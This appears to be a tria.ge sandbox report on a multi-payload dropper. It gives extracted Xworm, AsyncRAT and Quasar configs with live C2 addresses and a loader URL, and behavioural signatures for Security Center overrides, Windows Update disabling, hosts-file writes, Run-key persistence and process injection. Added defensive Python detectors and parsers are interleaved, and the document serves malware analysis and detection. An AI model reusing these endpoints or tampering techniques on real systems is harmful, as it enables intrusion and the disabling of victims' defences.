Resubmissions
Date              Submission ID        Score
18-09-2024 16:12  240918-tnhy5a1cmp    10
16-08-2024 04:34  240816-e7ba3azckk    10
16-08-2024 04:25  240816-e14zssyhpq    10
16-08-2024 04:25  240816-e1x69ayhpk    3
15-08-2024 21:56  240815-1tbkka1fpq    10
15-08-2024 21:47  240815-1nkw2swfre    10
15-08-2024 21:46  240815-1m318s1cpr    3
15-08-2024 21:46  240815-1mkvnawflb    10
13-08-2024 22:28  240813-2dvtyazbph    10
25-06-2024 11:24  240625-nhwp5swhja    10

Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-05-2024 09:14
Static task: static1
Behavioral task behavioral1: sample 4363463463464363463463463.exe, resource win7-20240508-en
Behavioral task behavioral2: sample 4363463463464363463463463.exe, resource win10v2004-20240426-en
Behavioral task behavioral3: sample New Text Document mod.exe, resource win7-20240221-en
Behavioral task behavioral4: sample New Text Document mod.exe, resource win10v2004-20240426-en
General
Target: New Text Document mod.exe
Size: 8KB
MD5: 69994ff2f00eeca9335ccd502198e05b
SHA1: b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256: 2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512: ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP: 96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted URL: https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted family: xworm
  Version: 5.0
  C2: 85.203.4.146:7000
  Mutex: eItTbYBfBYihwkyW
  Install_directory: %Userprofile%
  install_file: svchost.exe
Extracted family: asyncrat
  Version: Venom RAT + HVNC + Stealer + Grabber v6.0.2
  Botnet: Default
  C2: 85.209.133.18:4545
  Mutex: tdipywykihsjieff
  delay: 1
  install: false
  install_folder: %AppData%
Extracted family: quasar
  Version: 1.4.1
  Botnet: Office04
  C2: 79.132.193.215:4782
  Mutex: f99ccef5-65c4-4972-adf2-fb38921cc9fc
  encryption_key: 1C15E91ACCFAC60B043A1336CF6912EA8572BA83
  install_name: Client.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: Quasar Client Startup
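The three extracted configurations are the most directly actionable part of this report. The following is an added example, not tria.ge's code and not the malware's: it turns the C2 endpoints above into a match over network events and adds the one process-level check the Xworm config suggests (an svchost.exe that installs under %Userprofile% is never the real one, which lives only in System32 or SysWOW64). The event records are constructed for illustration; the PIDs and paths mirror the report where it has them, and the benign rows are invented.

```python
"""Detections derived from the extracted Xworm / AsyncRAT / Quasar configs.
Added example for this report; the event classes are reduced Sysmon-style
records and the sample events below are constructed, not captured."""
import re
from dataclasses import dataclass
from typing import Optional

# C2 endpoints copied from the report's "Malware Config" section.
C2_ENDPOINTS = {
    ("85.203.4.146", 7000): "xworm 5.0",
    ("85.209.133.18", 4545): "asyncrat (Venom RAT v6.0.2)",
    ("79.132.193.215", 4782): "quasar 1.4.1",
}

# The genuine svchost.exe only ever runs from these two directories; the
# xworm config's install_file=svchost.exe under %Userprofile% is the tell.
LEGIT_SVCHOST = re.compile(r"^C:\\Windows\\(System32|SysWOW64)\\svchost\.exe$", re.I)


@dataclass(frozen=True)
class NetEvent:          # Sysmon event 3 shape, reduced to what we need
    pid: int
    image: str
    dst_ip: str
    dst_port: int


@dataclass(frozen=True)
class ProcEvent:         # Sysmon event 1 shape, reduced
    pid: int
    image: str


def match_c2(ev: NetEvent) -> Optional[str]:
    """Finding text if the destination is one of the extracted C2s, else None."""
    family = C2_ENDPOINTS.get((ev.dst_ip, ev.dst_port))
    if family is None:
        return None
    return f"C2 {family}: {ev.image} (pid {ev.pid}) -> {ev.dst_ip}:{ev.dst_port}"


def fake_svchost(ev: ProcEvent) -> Optional[str]:
    """Finding text for an svchost.exe image outside System32/SysWOW64."""
    if ev.image.rsplit("\\", 1)[-1].lower() != "svchost.exe":
        return None
    if LEGIT_SVCHOST.match(ev.image):
        return None
    return f"svchost.exe outside System32: {ev.image} (pid {ev.pid})"


def scan(net_events, proc_events) -> list:
    """Run both checks and return the findings in event order."""
    findings = [f for ev in net_events if (f := match_c2(ev))]
    findings += [f for ev in proc_events if (f := fake_svchost(ev))]
    return findings


# Constructed sample events (not from the report).  The first three network
# rows and the first process row reuse paths/PIDs the report lists.
SAMPLE_NET = [
    NetEvent(6100, r"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe", "85.203.4.146", 7000),
    NetEvent(8168, r"C:\Users\Admin\AppData\Local\Temp\a\client.exe", "79.132.193.215", 4782),
    NetEvent(4392, r"C:\Users\Admin\AppData\Local\Temp\a\win1.exe", "85.209.133.18", 4545),
    NetEvent(1234, r"C:\Program Files\Mozilla Firefox\firefox.exe", "93.184.216.34", 443),
]
SAMPLE_PROC = [
    ProcEvent(6100, r"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"),
    ProcEvent(6880, r"C:\Windows\System32\svchost.exe"),
    ProcEvent(4444, r"C:\Windows\SysWOW64\svchost.exe"),
]

if __name__ == "__main__":
    for line in scan(SAMPLE_NET, SAMPLE_PROC):
        print(line)
```

Port-and-address matching is deliberately exact: RAT operators rotate ports on the same host, so in production you would also alert on the bare IPs and on the cloudfront loader URL, but those are broader rules with their own false-positive profile.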
Signatures

Detect Xworm Payload  2 IoCs
  yara_rule family_xworm  C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  yara_rule family_xworm  behavioral6/memory/6100-5936-0x0000000000420000-0x0000000000430000-memory.dmp
Modifies security service  2 TTPs, 2 IoCs
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"  sysblardsv.exe
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"  syslmgrsvc.exe
  (Start = 4 is SERVICE_DISABLED: both dropped binaries disable the Windows Update service.)
Quasar payload  2 IoCs
  yara_rule family_quasar  C:\Users\Admin\AppData\Local\Temp\a\client.exe
  yara_rule family_quasar  behavioral6/memory/8168-16123-0x0000000000DF0000-0x0000000001114000-memory.dmp
Signature without a title on the page (Windows Security Center overrides)  18 IoCs
  Each of sysblardsv.exe, syslmgrsvc.exe and winqlsdrvcs.exe sets the following six values to "1" (Set value (int)) under \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center:
    AntiVirusOverride, AntiVirusDisableNotify, FirewallOverride, FirewallDisableNotify, UpdatesOverride, UpdatesDisableNotify
  (These are the legacy Security Center values: *DisableNotify silences the notification for that component and *Override marks the component as monitored by the user rather than by Security Center.)
Async RAT payload  1 IoC
  yara_rule family_asyncrat  C:\Users\Admin\AppData\Local\Temp\a\win1.exe
Blocklisted process makes network request  1 IoC
  flow 188  pid 7488  powershell.exe

Signature without a title on the page (powershell.exe processes)  4 IoCs
  pid 5560 powershell.exe, pid 7488 powershell.exe, pid 1168 powershell.exe, pid 6488 powershell.exe
Creates new service(s)  2 TTPs

Downloads MZ/PE file
Drops file in Drivers directory  2 IoCs
  File created  C:\Windows\system32\drivers\etc\hosts  print.exe
  File created  C:\Windows\system32\drivers\etc\hosts  updater.exe
  (Both writes target the hosts file itself, not a driver; the report does not show the content written, so the file needs to be pulled from the image and read.)
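When two dropped binaries rewrite the hosts file, the next step is to read what they left behind. The block below is an added example (not part of the report): a small hosts-file parser that classifies every effective line as harmless loopback, a sinkhole (a real name blackholed to 0.0.0.0 or 127.0.0.1) or a redirect. The sample hosts content is constructed with RFC 2606 names; the one routable address reused in it is the AsyncRAT C2 from this report.

```python
"""Triage a Windows hosts file after seeing it rewritten by malware.
Added example; the SAMPLE_HOSTS text is constructed, not recovered from
the analysis image.  Path on the box: C:\Windows\system32\drivers\etc\hosts"""
import ipaddress

# Addresses that make a name unreachable rather than sending it elsewhere.
SINKHOLE = {"0.0.0.0", "127.0.0.1", "::1"}
# Names that legitimately map to loopback on a stock system.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return [(ip, [names])] for every effective line.  Blank lines, full-line
    comments and trailing '# ...' comments are dropped, as the resolver does."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        if names:                       # an IP with no names resolves nothing
            entries.append((ip, names))
    return entries


def classify(ip, names):
    """'local'     loopback for localhost-style names only (stock behaviour)
       'sinkhole'  real names pointed at a blackhole address (update/AV blocking)
       'redirect'  names pointed at some other address (phishing, C2 pinning)
       'malformed' not an IP address at all"""
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return "malformed"
    if ip in SINKHOLE:
        return "local" if all(n.lower() in LOCAL_NAMES for n in names) else "sinkhole"
    return "redirect"


def suspicious_entries(text):
    """Every entry except harmless loopback lines, with its classification."""
    return [(ip, names, kind) for ip, names in parse_hosts(text)
            if (kind := classify(ip, names)) != "local"]


# Constructed hosts file.  A stock Windows hosts file is comments only, so on
# a clean machine parse_hosts() returns an empty list.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#    127.0.0.1       localhost
#    ::1             localhost
127.0.0.1 localhost
0.0.0.0 update.example.com    # added by dropper
127.0.0.1 telemetry.example.net definitions.example.net
85.209.133.18 login.example.org
"""

if __name__ == "__main__":
    for ip, names, kind in suspicious_entries(SAMPLE_HOSTS):
        print(f"{kind:9} {ip:15} {' '.join(names)}")
```

The useful property is the empty-on-clean baseline: anything parse_hosts() returns on a Windows box other than loopback lines is worth a look, and a sinkhole of update or security-vendor names fits the Security Center tampering elsewhere in this report.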
Possible privilege escalation attempt  2 IoCs
  pid 6332 takeown.exe
  pid 6156 icacls.exe
Checks computer location settings  2 TTPs, 8 IoCs
Looks up country code configured in the registry, likely geofence.
  Key value queried  \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation
  by: output.exe, oiii.exe, conhost.exe, inte.exe, 222.exe, Pirate_24S.exe, WScript.exe, New Text Document mod.exe
Drops startup file  2 IoCs
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  svchost.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  svchost.exe
Executes dropped EXE  59 IoCs
  pid / process, in report order:
  4436 xin.exe, 3256 eagleget-2-1-6-50.exe, 4304 AntiVirus2.exe, 6532 Setup.exe, 6100 svchost.exe, 4392 win1.exe,
  2360 output.exe, 5488 SIG.EXE, 6476 alabi.exe, 5168 crt.exe, 6896 crt.tmp, 5500 soundermidiplayer.exe,
  3456 soundermidiplayer.exe, 860 oiii.exe, 6412 wmpnetwk.exe, 5892 wmixedwk.exe, 6316 conhost.exe,
  6644 sdf34ert3etgrthrthfghfghjfgh.exe, 5136 7z.exe, 6800 7z.exe, 6668 7z.exe, 7472 katD433.tmp, 3272 svcshost.exe,
  3776 o2i3jroi23joj23ikrjokij3oroi.exe, 5268 inte.exe, 2248 katDA1F.tmp, 5328 vpn-1002.exe, 4568 tdrpload.exe,
  7136 print.exe, 368 sysblardsv.exe, 1420 222.exe, 2556 7z.exe, 7756 7z.exe, 6008 7z.exe, 5916 7z.exe, 5216 7z.exe,
  4476 7z.exe, 7628 7z.exe, 7216 7z.exe, 5256 7z.exe, 6256 Installer.exe, 7432 Pirate_24S.exe, 7184 updater.exe,
  6772 270914205.exe, 7484 syslmgrsvc.exe, 5776 adwmbjfsmbak.exe, 8168 client.exe, 1680 Client.exe,
  6192 2328932319.exe, 2144 reverse.exe, 5504 64.exe, 216 winqlsdrvcs.exe, 3328 744220930.exe, 6208 1346524297.exe,
  4328 2466314816.exe, 760 Windows Security Upgrade Service.exe, 7860 1679313164.exe, 6424 2269015714.exe,
  6728 1202339053.exe
Loads dropped DLL  20 IoCs
  pid / process, in report order:
  4436 xin.exe, 6896 crt.tmp (3 loads), 5608 FUT.au3, 6412 wmpnetwk.exe, 5892 wmixedwk.exe, 5136 7z.exe, 6800 7z.exe,
  6668 7z.exe, 5328 vpn-1002.exe, 2556 7z.exe, 7756 7z.exe, 6008 7z.exe, 5916 7z.exe, 5216 7z.exe, 4476 7z.exe,
  7628 7z.exe, 7216 7z.exe, 5256 7z.exe
Modifies file permissions  1 TTPs, 2 IoCs
  pid 6332 takeown.exe
  pid 6156 icacls.exe
Reads user/profile data of web browsers  2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Signature without a title on the page (Windows Security Center overrides, second rule)  21 IoCs
  Each of sysblardsv.exe, syslmgrsvc.exe and winqlsdrvcs.exe sets the following seven values to "1" (Set value (int)) under \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center:
    AntiVirusOverride, AntiVirusDisableNotify, AntiSpywareOverride, FirewallOverride, FirewallDisableNotify, UpdatesOverride, UpdatesDisableNotify
  (Same writes as the earlier untitled block plus AntiSpywareOverride; this is a second signature matching on the same events.)
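Sandbox exports like this one flatten every registry write into one long run of `Set value (type) \REGISTRY\... = "value" process.exe` records, which is awkward to grep and easy to misread. The following is an added example, not part of the report or of tria.ge: a parser for that record shape, plus a small lookup that states what each write in the two Security Center blocks, the wuauserv block and the Run-key block actually does. The sample input copies five records verbatim from this report and is the only input the block uses; the semantic labels are the editor's, not the sandbox's.

```python
"""Parse flattened 'Set value (...) \\REGISTRY\\... = "v" proc.exe' records
and explain the security-relevant ones.  Added example for this report."""
import re
from collections import defaultdict
from typing import Optional

# One record.  The key path may contain spaces ("Security Center"), so the key
# is matched lazily up to the last backslash before ' = "'.  The process name
# is matched lazily up to the next record, a trailing ' -' or end of input.
RECORD = re.compile(
    r'Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\.+?)\\(?P<name>[^\\]+?) = '
    r'"(?P<value>[^"]*)" (?P<proc>.+?\.exe)(?=\s+Set value|\s+-\s*$|\s*$)',
    re.I | re.S,
)

SECURITY_CENTER = r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center"
SERVICES = r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services"
SERVICE_START = {"2": "auto start", "3": "manual", "4": "disabled (SERVICE_DISABLED)"}


def parse(text):
    """Return the records as dicts with keys type, key, name, value, proc."""
    return [m.groupdict() for m in RECORD.finditer(text)]


def explain(rec) -> Optional[str]:
    """Plain-language meaning of a write, or None if it is not one we track."""
    key, name, value = rec["key"], rec["name"], rec["value"]
    if key.endswith(r"\CurrentVersion\Run"):
        return f"persist via Run value {name} -> {value}"
    if key == SECURITY_CENTER and value == "1":
        if name.endswith("DisableNotify"):
            return f"suppress Security Center notifications for {name[:-len('DisableNotify')]}"
        if name.endswith("Override"):
            comp = name[:-len("Override")]
            return f"mark {comp} as self-monitored (Security Center stops alerting on it)"
    if key.startswith(SERVICES + "\\") and name == "Start":
        svc = key.rsplit("\\", 1)[-1]
        return f"set service {svc} start type to {SERVICE_START.get(value, value)}"
    return None


def tamper_report(text):
    """Map process name -> list of explained writes, in record order."""
    by_proc = defaultdict(list)
    for rec in parse(text):
        why = explain(rec)
        if why:
            by_proc[rec["proc"]].append(why)
    return dict(by_proc)


# Five records copied from this report, run together exactly as the export
# shows them (constructed input for the example).
SAMPLE = (
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysblardsv.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" syslmgrsvc.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" winqlsdrvcs.exe '
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysblardsv.exe '
    r'Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmokeUnity = "C:\\Users\\Admin\\Documents\\Mochacha\\NaturalValue.exe" SIG.EXE -'
)

if __name__ == "__main__":
    for proc, writes in tamper_report(SAMPLE).items():
        print(proc)
        for w in writes:
            print("   ", w)
```

Grouping by process is what makes the pattern visible: three differently named droppers (sysblardsv.exe, syslmgrsvc.exe, winqlsdrvcs.exe) perform the identical set of writes, which is the fingerprint of one loader stamped out three times rather than three unrelated tools.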
Accesses cryptocurrency files/wallets, possible credential harvesting  2 TTPs
Adds Run key to start application  2 TTPs, 4 IoCs
  Set value (str)  \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmokeUnity = "C:\\Users\\Admin\\Documents\\Mochacha\\NaturalValue.exe"  SIG.EXE
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysblardsv.exe"  tdrpload.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syslmgrsvc.exe"  270914205.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winqlsdrvcs.exe"  2328932319.exe
  (Two of the writes target the same "Windows Settings" value, so only one of sysblardsv.exe / syslmgrsvc.exe survives there; the three targets are the binaries dropped into C:\Windows below.)
Checks installed software on the system  1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2  1 TTPs, 4 IoCs
  flow 182  pastebin.com
  flow 39   raw.githubusercontent.com
  flow 40   raw.githubusercontent.com
  flow 181  pastebin.com
Looks up external IP address via web service  1 IoC
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 57  ip-api.com
Drops file in System32 directory  11 IoCs
  File opened for modification  C:\Windows\System32\config\systemprofile\AppData\Local\7936.hecate  svchost.exe
  File opened for modification  C:\Windows\system32\Client.exe  client.exe
  File created  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
  File opened for modification  C:\Windows\System32\config\systemprofile\AppData\Local\5488.hecate  svchost.exe
  File opened for modification  C:\Windows\System32\config\systemprofile\AppData\Local\info  svchost.exe
  File opened for modification  C:\Windows\System32\config\systemprofile\AppData\Local\3736.hecate  svchost.exe
  File opened for modification  C:\Windows\system32\MRT.exe  Installer.exe
  File created  C:\Windows\system32\Client.exe  client.exe
  File created  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File opened for modification  C:\Windows\system32\MRT.exe  adwmbjfsmbak.exe
  File opened for modification  C:\Windows\System32\config\systemprofile\AppData\Local\3380.hecate  svchost.exe
  (Writes under config\systemprofile are the SYSTEM account's profile, so svchost.exe and powershell.exe here are running as SYSTEM. MRT.exe is the Malicious Software Removal Tool binary; two dropped executables open it for modification. Client.exe in system32 matches the Quasar install_name.)
Suspicious use of SetThreadContext  35 IoCs
  source pid/image -> target pid/image
  4436 xin.exe -> 6520 MsBuild.exe
  6532 Setup.exe -> 5964 comp.exe
  5488 SIG.EXE -> 6928 csc.exe
  5892 wmixedwk.exe -> 6880 svchost.exe
  6644 sdf34ert3etgrthrthfghfghjfgh.exe -> 7472 katD433.tmp
  3776 o2i3jroi23joj23ikrjokij3oroi.exe -> 2248 katDA1F.tmp
  7184 updater.exe -> 6068 conhost.exe
  7184 updater.exe -> 5964 conhost.exe
  5776 adwmbjfsmbak.exe -> 5704 conhost.exe
  5776 adwmbjfsmbak.exe -> 5756 explorer.exe
  6880 svchost.exe -> svchost.exe, 25 targets in report order: 5488, 1196, 7936, 7616, 7700, 6908, 3744, 4580, 7856, 1680, 5996, 8136, 7576, 3736, 6728, 5828, 3968, 2736, 3624, 2148, 1980, 3920, 1280, 3652, 3380
  (svchost.exe 6880 is itself the target of wmixedwk.exe before it becomes the injector. The numeric .hecate file names it writes under System32\config\systemprofile\AppData\Local (7936, 5488, 3736, 3380) match four of its target PIDs.)
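The SetThreadContext list is the injection graph of this sample, and two questions answer most of it: which writes cross into a differently named image (the hollowing shape, payload placed into MsBuild.exe, csc.exe, conhost.exe, explorer.exe), and which single process fans out into many targets. The block below is an added example, not tria.ge's code: a parser for the flattened `PID a set thread context of b a src dst` records plus those two queries. Its input is ten of the report's 35 records copied verbatim; the interpretation of cross-image writes as hollowing candidates is the editor's, not a claim the report makes.

```python
"""Build an injection graph from flattened SetThreadContext records.
Added example for this report; SAMPLE holds ten records copied from it."""
import re
from collections import defaultdict

# One record: source PID, target PID, source PID repeated, source image, target image.
INJECT = re.compile(r"PID (\d+) set thread context of (\d+) \1 (\S+) (\S+)")


def parse_injections(text):
    """Return (src_pid, dst_pid, src_image, dst_image) tuples in report order."""
    return [(int(s), int(t), src, dst) for s, t, src, dst in INJECT.findall(text)]


def cross_image(edges):
    """Writes into a process with a different image name: the shape of process
    hollowing, where a payload is placed into a benign-looking host."""
    return [e for e in edges if e[2].lower() != e[3].lower()]


def fan_out(edges):
    """Map (src_pid, src_image) -> sorted list of distinct target PIDs."""
    out = defaultdict(set)
    for s, t, src, _ in edges:
        out[(s, src)].add(t)
    return {k: sorted(v) for k, v in out.items()}


def busiest(edges):
    """The injector with the most distinct targets."""
    return max(fan_out(edges).items(), key=lambda kv: len(kv[1]))[0]


# Constructed input: ten of the report's records, run together as exported.
SAMPLE = (
    "PID 4436 set thread context of 6520 4436 xin.exe MsBuild.exe "
    "PID 6532 set thread context of 5964 6532 Setup.exe comp.exe "
    "PID 5488 set thread context of 6928 5488 SIG.EXE csc.exe "
    "PID 5892 set thread context of 6880 5892 wmixedwk.exe svchost.exe "
    "PID 6880 set thread context of 5488 6880 svchost.exe svchost.exe "
    "PID 6880 set thread context of 1196 6880 svchost.exe svchost.exe "
    "PID 6644 set thread context of 7472 6644 sdf34ert3etgrthrthfghfghjfgh.exe katD433.tmp "
    "PID 6880 set thread context of 1680 6880 svchost.exe svchost.exe "
    "PID 7184 set thread context of 6068 7184 updater.exe conhost.exe "
    "PID 5776 set thread context of 5756 5776 adwmbjfsmbak.exe explorer.exe -"
)

if __name__ == "__main__":
    edges = parse_injections(SAMPLE)
    for s, t, src, dst in cross_image(edges):
        print(f"hollowing candidate: {src} ({s}) -> {dst} ({t})")
    pid, image = busiest(edges)
    print(f"busiest injector: {image} ({pid}) -> {fan_out(edges)[(pid, image)]}")
```

Run over the full 35 records the same queries return svchost.exe 6880 as the only process with more than two targets, which is why its 25 same-image writes belong in one line of the report rather than 25.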
Drops file in Program Files directory  32 IoCs
  All paths are under C:\Program Files\Windows Media Player\
  oiii.exe: File opened for modification wmixedwk.exe; File created mpsvc.dll, wmpnetwk.exe, wmixedwk.exe, background.jpg
  svchost.exe: File opened for modification mpsvc.dll (1), ppqqxpa (1), ppqqxds (1), ppqqxpp (1), ppqqxpb (23 separate events)
Drops file in Windows directory  6 IoCs
  File created + File opened for modification  C:\Windows\sysblardsv.exe  tdrpload.exe
  File created + File opened for modification  C:\Windows\syslmgrsvc.exe  270914205.exe
  File created + File opened for modification  C:\Windows\winqlsdrvcs.exe  2328932319.exe
Launches sc.exe  9 IoCs
sc.exe is a Windows utility to control services on the system.
  sc.exe PIDs: 3464, 7876, 5816, 4384, 5760, 7588, 6164, 2648, 1456
Enumerates physical storage devices  1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash  1 IoC
  pid 5324 WerFault.exe, crashed target pid 4436 xin.exe
Checks processor information in registry  2 TTPs, 3 IoCs
Processor information is often read in order to detect sandboxing environments.
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  AcroRd32.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  FUT.au3
Creates scheduled task(s)  1 TTPs, 1 IoC
Schtasks is often used by malware for persistence or to perform post-infection execution.
Kills process with taskkill  1 IoC
  pid 7048 taskkill.exe
Signature without a title on the page (Internet Explorer FeatureControl key)  1 IoC
  Key created  \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe
Modifies data under HKEY_USERS  64 IoCs
  All keys below are relative to \REGISTRY\USER\.DEFAULT\, the hive loaded for the SYSTEM account. Most entries are indexer and shell noise; the powershell.exe ones show a SYSTEM-context PowerShell initialising its certificate stores, consistent with the systemprofile paths in the System32 block.
  SearchProtocolHost.exe (37 entries):
    Key created: Software; Software\Microsoft; Software\Microsoft\Windows; Software\Microsoft\Windows\CurrentVersion\Explorer; ...\Explorer\FileExts; ...\Explorer\FileExts\.pdf; ...\Explorer\FileExts\.xht; ...\Explorer\FileExts\.svg\OpenWithList; ...\Explorer\FileExts\.html\OpenWithList; ...\Explorer\FileExts\.xht\OpenWithList; ...\Explorer\FileExts\.wvx\OpenWithList; ...\Explorer\FileExts\.DVR-MS\OpenWithList
    Set value (data) under Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\, each with interface {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF: {E46787A1-4629-4423-A693-BE1F003B2742} = 0100000000000000ab5fc8a628acda01; {C120DE80-FDE4-49F5-A713-E902EF062B8A} = 010000000000000098a082a728acda01; {487BA7B8-4DB0-465F-B122-C74A445A095D} = 0100000000000000fe6f19a728acda01; {5985FC23-2588-4D9A-B38B-7E7AFFAB3155} = 0100000000000000bdeab2a628acda01; {A38B883C-1682-497E-97B0-0A3A9E801682} = 0100000000000000c2767ea628acda01; {F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} = 01000000000000004a11baa628acda01; {1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} = 0100000000000000f724cda628acda01
    Set value (str) under Software\Classes\Local Settings\MuiCache\2a\52C64B7E\: @C:\Windows\System32\ieframe.dll,-914 = "SVG Document"; ieframe.dll,-24585 = "Cascading Style Sheet Document"; ieframe.dll,-913 = "MHTML Document"; ieframe.dll,-915 = "XHTML Document"; @C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video"; unregmp2.exe,-9923 = "Windows Media playlist"; unregmp2.exe,-9902 = "Movie Clip"; @C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"; @C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-170 = "Microsoft PowerPoint 97-2003 Presentation"; oregres.dll,-142 = "Microsoft OneNote Table Of Contents"; oregres.dll,-127 = "OpenDocument Text"; oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"; oregres.dll,-116 = "Microsoft Excel Template"; oregres.dll,-107 = "Microsoft Excel Comma Separated Values File"; oregres.dll,-111 = "Microsoft Excel Macro-Enabled Template"; oregres.dll,-182 = "Microsoft PowerPoint Template"; oregres.dll,-178 = "OpenDocument Presentation"; oregres.dll,-131 = "Rich Text Format"
  SearchIndexer.exe (6 entries), Set value (str) under Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll: -2 = "Microsoft Script Detection"; -3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration"; -4 = "Microsoft Simplified Chinese to Traditional Chinese Transliteration"; -5 = "Microsoft Transliteration Engine"; -6 = "Microsoft Cyrillic to Latin Transliteration"; -8 = "Microsoft Malayalam to Latin Transliteration"
  powershell.exe (15 entries), Key created: Software\Microsoft\SystemCertificates\CA\CRLs; ...\SystemCertificates\trust; ...\SystemCertificates\trust\Certificates; ...\SystemCertificates\trust\CTLs; ...\SystemCertificates\Disallowed; ...\SystemCertificates\Disallowed\Certificates; ...\SystemCertificates\Disallowed\CTLs; ...\SystemCertificates\Root\CRLs; ...\SystemCertificates\Root\Certificates; ...\SystemCertificates\TrustedPeople; ...\SystemCertificates\TrustedPeople\CTLs; Software\Policies\Microsoft\SystemCertificates\TrustedPeople; Software\Policies\Microsoft\SystemCertificates\trust\Certificates; Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs; Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  SearchFilterHost.exe (5 entries), Key created: SOFTWARE\Microsoft\MPEG2Demultiplexer; Software\Microsoft\SBE; Software\Microsoft\ActiveMovie; Software\Microsoft\ActiveMovie\devenum 64-bit; Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
  svchost.exe (1 entry), Key created: SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Modifies registry class 2 IoCs
Processes:
output.exe, Pirate_24S.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | output.exe
Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | Pirate_24S.exe
Processes:
eagleget-2-1-6-50.exe
description | ioc | process
